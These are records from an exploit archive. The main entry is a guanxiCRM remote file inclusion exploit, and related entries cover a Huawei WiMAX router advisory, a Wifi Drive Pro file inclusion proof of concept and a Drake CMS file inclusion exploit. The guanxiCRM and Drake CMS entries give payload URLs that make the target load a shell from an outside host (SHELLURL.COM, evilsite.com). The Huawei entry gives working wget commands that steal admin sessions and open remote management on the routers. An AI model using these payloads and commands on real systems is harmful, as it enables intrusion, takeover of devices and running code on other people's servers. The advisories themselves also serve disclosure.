{"type": "zdt", "lastseen": "2016-04-20T02:03:22", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "guanxiCRM Business Solution <= 0.9.1 Remote File Include Vulnerability", "published": "2006-09-16T00:00:00", "href": "http://0day.today/exploit/description/846", "cvss": {"vector": "NONE", "score": 0.0}, "description": "Exploit for unknown platform in category web applications", "hash": "a7a996512b5deefa59f49fefcdfd607d5590269b7dad0b85901da5f41b4708b1", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "======================================================================\r\nguanxiCRM Business Solution <= 0.9.1 Remote File Include Vulnerability\r\n======================================================================\r\n\r\n\r\n\r\n#==============================================================================================\r\n#guanxiCRM <= v0.9.1 (rootpath) Remote File Inclusion Exploit\r\n#===============================================================================================\r\n# \r\n#Critical Level : Dangerous \r\n# \r\n#Venedor site : http://sourceforge.net/projects/guanxicrm/ \r\n# \r\n#Version : v0.9.1 \r\n# \r\n#================================================================================================\r\n#\r\n#Example : http://www.nu3d.com/crm\r\n#\r\n#================================================================================================\r\n#Bug in : include/phpxd/phpXD.php\r\n#\r\n#Vlu Code :\r\n#--------------------------------\r\n# $path = $appconf[\"rootpath\"]. \"/include/phpxd/\";\r\n#\r\n# require($path.\"include/dom.php\");\r\n# require($path.\"include/dtd.php\");\r\n# require($path.\"include/parser.php\");\r\n# ?>\r\n#\r\n#\r\n#================================================================================================\r\n#\r\n#Exploit :\r\n#--------------------------------\r\n#\r\n#http://sitename.com/[Script Path]/include/phpxd/phpXD.php?appconf[rootpath]=http://SHELLURL.COM?&cmd=id\r\n#\r\n#================================================================================================\r\n#Discoverd By : SHiKaA\r\n#\r\n#Special Thx To : Str0ke & simoo & XoRoN & Saudi Hackerz\r\n==================================================================================================\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-846", "sourceHref": "http://0day.today/exploit/846", "modified": "2006-09-16T00:00:00", "reporter": "SHiKaA", "viewCount": 1, "enchantments": {"vulnersScore": 3.2}}

{"result": {"zdt": [{"lastseen": "2016-04-20T02:28:49", "references": [], "edition": 1, "description": "Exploit for hardware platform in category web applications", "reporter": "Pierre Kim", "published": "2015-12-01T00:00:00", "title": "Huawei Wimax CSRF / Information Disclosure / Manipulation Vulnerabilities", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-12-01T00:00:00", "id": "1337DAY-ID-24638", "href": "http://0day.today/exploit/description/24638", "sourceData": "## Advisory Information\r\n\r\nTitle: Huawei Wimax routers vulnerable to multiple threats\r\nAdvisory URL: https://pierrekim.github.io/advisories/2015-huawei-0x01.txt\r\nBlog URL: https://pierrekim.github.io/blog/2015-12-01-Huawei-Wimax-routers-vulnerable-to-multiple-threats.html\r\nDate published: 2015-12-01\r\nVendors contacted: Huawei, CERT.org\r\nRelease mode: Released\r\nCVE: no current CVE\r\nCERT Tracking number: VU#406192\r\nCNNVD: no current CNNVD\r\n\r\n\r\n\r\n## Product Description\r\n\r\nHuawei Technologies Co. Ltd. is a Chinese multinational networking\r\nand telecommunications equipment and services company.\r\nIt is the largest telecommunications equipment manufacturer in the world.\r\n\r\n\r\n\r\n## Vulnerabilities Summary\r\n\r\nThe Huawei BM626e device is a Wimax router / access point overall badly\r\ndesigned with a lot of vulnerabilities. The device is provided by\r\nMTN Cote d'Ivoire as a \"Wibox\". It's available in a number of countries to\r\nprovide Internet with a Wimax network.\r\n\r\nThe tests below are done using the last available firmware\r\n(firmware V100R001CIVC24B010).\r\n\r\nNote: This firmware is being used by other Huawei Wimax CPEs and\r\nHuawei confirmed that the devices below are vulnerable to the same threats:\r\n\r\n - EchoLife BM626e WiMAX CPE\r\n - EchoLife BM626 WiMAX CPE\r\n - EchoLife BM635 WiMAX CPE\r\n - EchoLife BM632 WiMAX CPE\r\n - EchoLife BM631a WiMAX CPE\r\n - EchoLife BM632w WiMAX CPE\r\n - EchoLife BM652 WiMAX CPE\r\n\r\nThe routers are still on sale and used in several countries. They are\r\nused, at least, in these countries:\r\n\r\n - MTN CI (Cote d'Ivoire)\r\n - Iran Cell (Iran)\r\n - Irak Telecom (Irak)\r\n - Libyamax (Libya)\r\n - Globe Telecom (Philippines)\r\n - Zain Bahrain (Bahrain)\r\n - FreshTel (Ukraine)\r\n\r\n\r\n\r\n## Details - unauthenticated information disclosure\r\n\r\nBy default, the webpage http://192.168.1.1/check.html contains\r\nimportant information\r\n(wimax configuration, network configuration, wifi and sip\r\nconfiguration ...) and is reachable without authentication.\r\n\r\nA JavaScript redirection will annoy the attacker (/login.html) and can\r\nbe easily defeated by using wget:\r\n\r\n root@kali:~# wget http://192.168.1.1/check.html; less check.html\r\n\r\n\r\n\r\n## Details - Admin session cookie hijacking\r\n\r\nIf an admin is currently managing the device (OR used the device but\r\ndidn't properly disconnect),\r\nthe current/used session can be stolen by an attacker located in the\r\nLAN (or WAN if the HTTP is open in the WAN interface).\r\n\r\nThe admin session id (\"SID\") can be recovered in multiple webpages\r\nwithout authentication:\r\n\r\n - http://192.168.1.1/wimax/security.html\r\n - http://192.168.1.1/static/deviceinfo.html\r\n - ...\r\n\r\nThe security.html webpage contains a valid session ID, without\r\nauthentication, within the JavaScript sources:\r\n\r\n sid=\"SID24188\"\r\n\r\n\r\nA \"protection\" is written in JavaScript and will redirect the attacker\r\nto the login webpage\r\nbut the Javascript contains the session of the admin (sid=\"SIDXXXXX\")\r\nso the attacker can retrieve it easily using wget:\r\n\r\n root@kali:~# wget http://192.168.1.1/wimax/security.html ; less security.html\r\n root@kali:~# wget http://192.168.1.1/static/deviceinfo.html ; less\r\ndeviceinfo.html\r\n\r\nNote that, by visiting the webpages, the attacker will also disconnect\r\nthe administrator from the Control Panel (http://192.168.1.1/)\r\n\r\n\r\n\r\n## Details - Information disclosure and CSRF using the stolen admin session ID\r\n\r\nBy using the previously stolen SID, it is possible to perform\r\nadministration tasks without having proper credentials:\r\n\r\n - editing the WLAN configuration,\r\n - editing the WAN configuation,\r\n - editing the LAN configuration,\r\n - opening HTTP/HTTPS/TELNET/SSH in the LAN and WAN interfaces,\r\n - changing DMZ configurations,\r\n - editing PortMapping,\r\n - editing Porttrigger,\r\n - editing SIP configuration,\r\n - uploading a custom firmware,\r\n - ...\r\n\r\n\r\no Retrieve private information (network information):\r\n\r\n\r\n root@kali:~# wget -qO-\r\n'http://192.168.1.1/static/rethdhcp.jsx?WWW_SID=SID24188&t=0'\r\n Saving to: `STDOUT'\r\n\r\n stats={};do{stats.dhcplist=\"44:8A:5B:AA:AA:AA,192.168.1.3,71:52:02@00:E0:4C:AA:AA:AA,192.168.1.2,71:52:02\";\r\n stats.reth=\"\r\n eth0 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1\r\n RX packets:27 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:109 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:2887 (2.8 KiB) TX bytes:46809 (45.7 KiB)\r\n Interrupt:9 Base address:0x4000\r\n eth1 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:\r\n RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\r\n Interrupt:9 Base address:0x4000\r\n eth2 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1\r\n RX packets:2530 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:2619 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:351557 (343.3 KiB) TX bytes:536669 (524.0 KiB)\r\n Interrupt:9 Base address:0x4000\r\n eth3 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:1\r\n RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\r\n Interrupt:9 Base address:0x4000\r\n \";stats.wlaninfo=\"\r\n wl0 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\r\n RX packets:5257 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:846 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:1117126 (1.0 MiB) TX bytes:279600 (273.0 KiB)\r\n wl1 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\r\n RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n [...]\r\n\r\n root@kali:~#\r\n\r\n\r\n\r\no Retrieve private information:\r\n\r\nAn other JSX webpage:\r\nhttp://192.168.1.1/advanced/WANconnect.jsx?WWW_SID=SID24188&&t=0\r\n\r\n root@kali:~# wget -qO-\r\n'http://192.168.1.1/advanced/WANconnect.jsx?WWW_SID=SID24188&&t=0'\r\n stats={};do{stats.PPPoEStatus='Disconnected';\r\nstats.GREStatus='Disconnected';stats.wpsmode=\"7\";stats.position=\"Idle,Idle,\"}while(0);\r\n\r\nIt's possible to get a lot of information by abusing JSX webpages.\r\nListing the JSX webpages is left as an exercise for the reader.\r\n\r\n\r\n\r\n\r\nThe Session ID can be used to change parameters in the Wimax router too:\r\n\r\no Editing the WLAN configuration:\r\n\r\nThis request will change the first SSID name to 'powned' (you need to\r\nedit the WWW_SID, by the one provided in the /wimax/security.html\r\nwebpage):\r\n\r\n root@kali:~# wget --no-cookies --header \"Cookie:\r\nLoginTimes=0:LoginOverTime=0; FirstMenu=User_1; SecondMenu=User_1_1;\r\nThirdMenu=User_1_1_1\"\r\n--post-data='WWW_SID=SID24188&REDIRECT=wlan.html&SERVICE=wifi&SLEEP=2&WLAN_WifiEnable=1&Wlan_chkbox=0&WLAN_WirelessMode=9&WLAN_Channel=0&WLAN_SSID1=powned&WLAN_HideSSID=0%3B0%3B&WLAN_AuthMode=WPAPSKWPA2PSK%3BWPAPSKWPA2PSK%3B&WLAN_EncrypType=TKIPAES%3BTKIPAES%3B&WLAN_COUNTRY_REGION=1&WLAN_Country_Code=1d&WLAN_TXPOWER_NOR=13&WLAN_MAXNUM_STA=16%3B16%3B&WLAN_FragThreshold=2346&WLAN_BeaconPeriod=100&WLAN_RTSThreshold=2347&WLAN_BssidNum=2&WLAN_WscConfMode=7&WLAN_WscAction=3&WLAN_CountryCode=CI&WLAN_WscPinCode=&WLAN_TXRATE=0&WLAN_HTBW=0&WLAN_NTH_SSID=1&WLAN_PinFlag=2'\r\nhttp://192.168.1.1/basic/mtk.cgi\r\n\r\n\r\no Opening the management interface:\r\n\r\nThis request will open HTTP/HTTPS/TELNET/SSH in the LAN AND the WAN\r\ninterfaces (you need to edit the WWW_SID, by the one provided in the\r\n/wimax/security.html webpage):\r\n\r\n root@kali:~# wget --no-cookies --header \"Cookie:\r\nLoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1;\r\nThirdMenu=User_2_1_0\"\r\n--post-data='WWW_SID=SID24188&REDIRECT=acl.html&SERVICE=mini_httpd%2Cmini_httpsd%2Ctelnetd%2Cdropbear&SLEEP=2&HTTPD_ENABLE=1&HTTPSD_ENABLE=1&MGMT_WEB_WAN=1&MGMT_TELNET_LAN=1&MGMT_TELNET_WAN=1&MGMT_SSH_LAN=1&MGMT_SSH_WAN=1&HTTPD_PORT=80&httpslan=getValue%28&HTTPSD_PORT=443&TELNETD_PORT=23&SSHD_PORT=22'\r\nhttp://192.168.1.1/basic/mtk.cgi\r\n\r\n (The legit administrator can check the changes here:\r\nhttp://192.168.1.1/advanced/acl.html)\r\n\r\n\r\no Changing \"DMZ action\" - redirecting WAN ports to a target client\r\nlocated in the LAN (you need to edit the WWW_SID, by the one provided\r\nin the /wimax/security.html webpage):\r\n\r\n root@kali:~# wget --no-cookies --header \"Cookie:\r\nLoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1;\r\nThirdMenu=User_2_1_0\"\r\n--post-data='WWW_SID=SID24188&REDIRECT=dmz.html&SERVICE=netfilter_dmz&NETFILTER_DMZ_HOST=192.168.1.2&NETFILTER_DMZ_ENABLE=1&DMZInterface=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1&DMZHostIPAddress=192.168.1.2&DMZEnable=on&TriggerPort=&TriggerPortEnd='\r\nhttp://192.168.1.1/advanced/user.cgi\r\n\r\n (The legit administrator can check the changes here:\r\nhttp://192.168.1.1/advanced/dmz.html)\r\n\r\n\r\nOther actions are possible and are left as an exercise for the reader:\r\n\r\n - Editing PortMapping\r\n - Editing Porttrigger\r\n - Editing Sip configuration\r\n - Uploading a custom firmware\r\n - ...\r\n\r\n\r\n\r\n## Vendor Response\r\n\r\nThe vulnerable routers are in the End Of Service cycle and will not be\r\nsupported anymore.\r\n\r\nThe vendor encourages its clients to discard existing unsupported models\r\nand to use new routers.\r\n\r\n\r\n\r\n## Report Timeline\r\n\r\n * Jul 01, 2015: Vulnerabilities found by Pierre Kim.\r\n * Oct 28, 2015: Huawei PSIRT is notified of the vulnerabilities.\r\n * Oct 28, 2015: Huawei PSIRT confirms the notification.\r\n * Nov 03, 2015: Huawei PSIRT is unable to reproduce the\r\nvulnerabilities (\"We cannot open the following web pages without\r\nauthentication\")\r\n * Nov 03, 2015: Pierre Kim informs Huawei to desactivate JavaScript\r\nand gives Huawei a complete scenario with Linux commands. Pierre Kim\r\nasks their firmware version.\r\n * Nov 04, 2015: Pierre Kim asks Huawei about potential difficulties\r\nwith the provided scenario.\r\n * Nov 05, 2015: Huawei PSIRT says that they are currently working on\r\nthe firmware version issue and will notify in due course.\r\n * Nov 09, 2015: Huawei PSIRT confirms the vulnerabilities affecting\r\nEchoLife BM626e WiMAX CPE. \"All the versions of this product are\r\nvulnerable\".\r\n * Nov 09, 2015: Pierre Kim asks about 8 other Wimax models which are\r\nlikely to be vulnerable too (using the same firmware) and asks about\r\nif security patches will be distributed or the devices are EoL.\r\n * Nov 11, 2015: Huawei PSIRT notifies the investigation of 8 other\r\nWimax models is in progress.\r\n * Nov 18, 2015: Huawei PSIRT confirms 6 models are affected (EchoLife\r\nBM626 WiMAX CPE, EchoLife BM635 WiMAX CPE, EchoLife BM632 WiMAX CPE,\r\nEchoLife BM631a WiMAX CPE, EchoLife BM632w WiMAX CPE, EchoLife BM652\r\nWiMAX CPE). The routers are in the End Of Service cycle and Huawei\r\nwould not support these models or provide fixed version or patch.\r\n * Nov 18, 2015: Huawei PSIRT asks to be notified when the advisory is posted.\r\n * Nov 19, 2015: Pierre Kim contacts CERT.org about the vulnerabilities.\r\n * Nov 23, 2015: Cert.org assigns VU#406192.\r\n * Nov 30, 2015: Pierre Kim indicates to Huawei PSIRT that he will\r\nrelease the advisory the December 1, 2015.\r\n * Dec 01, 2015: A public advisory is sent to security mailing lists.\r\n\r\n\r\n\r\n## Credit\r\n\r\nThese vulnerabilities were found by Pierre Kim (@PierreKimSec).\r\n\r\n\r\n\r\n## References\r\n\r\nhttps://pierrekim.github.io/advisories/2015-huawei-0x01.txt\r\nhttps://pierrekim.github.io/blog/2015-12-01-Huawei-Wimax-routers-vulnerable-to-multiple-threats.html\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/24638"}, {"lastseen": "2016-04-19T02:41:05", "references": [], "description": "Wifi Drive Pro version 1.2 suffers from a local file inclusion vulnerability.", "edition": 1, "reporter": "bot", "published": "2015-04-21T00:00:00", "type": "zdt", "title": "Wifi Drive Pro 1.2 Local File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-04-21T00:00:00", "href": "http://0day.today/exploit/description/23556", "id": "1337DAY-ID-23556", "sourceData": "Document Title:\r\n===============\r\nWifi Drive Pro v1.2 iOS - File Include Web Vulnerability\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nThis app lets you use your iphone, iPad or iPod Touch as a wireless USB drive through which you can download, save and view documents and files.\r\nUsing the app you can transfer files from your PC or Mac either wirelessly or through a USB port and carry your files wherever you go.\r\n\r\n(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/wifi-drive-pro/id579582610 )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official Wifi Drive Pro v1.2 iOS mobile application.\r\n\r\nAffected Product(s):\r\n====================\r\nMindspeak Software\r\nProduct: Wifi Drive Pro - iOS Mobile Web Application 1.2\r\n\r\nTechnical Details & Description:\r\n================================\r\nA local file include web vulnerability has been discovered in the official Mindspeak Software - Wifi Drive Pro v1.2 iOS mobile web-application.\r\nThe local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands \r\nto compromise the mobile web-application.\r\n\r\nThe web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject own files with malicious \r\n`filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in \r\nthe index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` \r\nin connection with the vulnerable file upload POST method request. \r\n\r\nRemote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious \r\nattack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. \r\n\r\nThe security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. \r\nExploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation \r\nof the local file include web vulnerability results in mobile application compromise or connected device component compromise.\r\n\r\nRequest Method(s):\r\n [+] [POST]\r\n\r\nVulnerable Module(s):\r\n [+] File Upload\r\n\r\nVulnerable Parameter(s):\r\n [+] filename\r\n\r\nAffected Module(s):\r\n [+] Index File Dir Listing (http://localhost:49276/)\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction.\r\nFor security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.\r\n\r\nPoC: GET\r\nhttp://localhost:49276//%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png\r\n\r\n\r\nPoC: Vulnerable Source\r\n<p><a href=\"..\">..</a><br>\r\n<a href=\"68-2.png\">68-2.png</a> ( 24.3 Kb, 2015-03-09 14:57:29 +0000)<br>\r\n<a href=\"/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png\"></%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a> ( 0.5 Kb, 2015-03-09 14:57:48 +0000)<br />\r\n</p><form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"form1\" id=\"form1\"><label>upload file<input type=\"file\" name=\"file\" id=\"file\" /></label>\r\n<label><input type=\"submit\" name=\"button\" id=\"button\" value=\"Submit\" /></label></form></body></html></iframe></a></p>\r\n\r\n\r\n--- PoC Session Logs [POST] (Inject)---\r\nStatus: 200[OK]\r\nPOST http://localhost:49276/ \r\nLoad Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr\u00f6\u00dfe des Inhalts[846] Mime Type[application/x-unknown-content-type]\r\n Request Header:\r\n Host[localhost:49276]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Accept-Language[de,en-US;q=0.7,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n Referer[http://localhost:49276/]\r\n Connection[keep-alive]\r\n POST-Daten:\r\n POST_DATA[-----------------------------28140821932238\r\nContent-Disposition: form-data; name=\"file\"; filename=\"%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png\"\r\nContent-Type: image/png\r\n\r\n\r\nReference(s):\r\nhttp://localhost:49276/\r\nhttp://localhost:49276//%3C./\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\nThe vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and \r\ndisallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.\r\nEncode the output in the file dir index list with the vulnerable name value to prevent an application-side injection attacks.\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.3)\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/23556"}, {"lastseen": "2016-04-20T02:31:04", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 1, "reporter": "GregStar", "published": "2006-11-04T00:00:00", "type": "zdt", "title": "Drake CMS < 0.2.3 ALPHA rev.916Remote File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-11-04T00:00:00", "href": "http://0day.today/exploit/description/1112", "id": "1337DAY-ID-1112", "sourceData": "==================================================================\r\nDrake CMS < 0.2.3 ALPHA rev.916Remote File Inclusion Vulnerability\r\n==================================================================\r\n\r\n\r\n\r\n**********************************************************************************************************\r\n \r\n\t\t\t Coding 4 Fun (c4f.pl) \r\n\t\t\t \r\n**********************************************************************************************************\r\n\r\n* Drake CMS v0.2.2 ALPHA rev.846 (http://drakecms.org) ; \r\n\r\n* Class = Remote File Inclusion ;\r\n\r\n* Found by = GregStar (gregstar[at]c4f[dot]pl) ;\r\n\r\n-------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n- Vulnerable Code in \"includes/xhtml.php\" :\r\n\r\n \tinclude $d_root.'classes/kses.php';\r\n\r\n++++++++++++++++++++++++++++++++++++++++++++\r\n\r\n- Exploit:\r\n\r\n\thttp://[target]/[path]/includes/xhtml.php?d_root=http://evilsite.com/shell?\r\n\r\n\r\n------------------------------------------------------------------------------------------------------------------\r\n\r\nGr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,reyw,kw@ch and for all friends.\r\n\r\n**************************************************************************************************************\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/1112"}]}}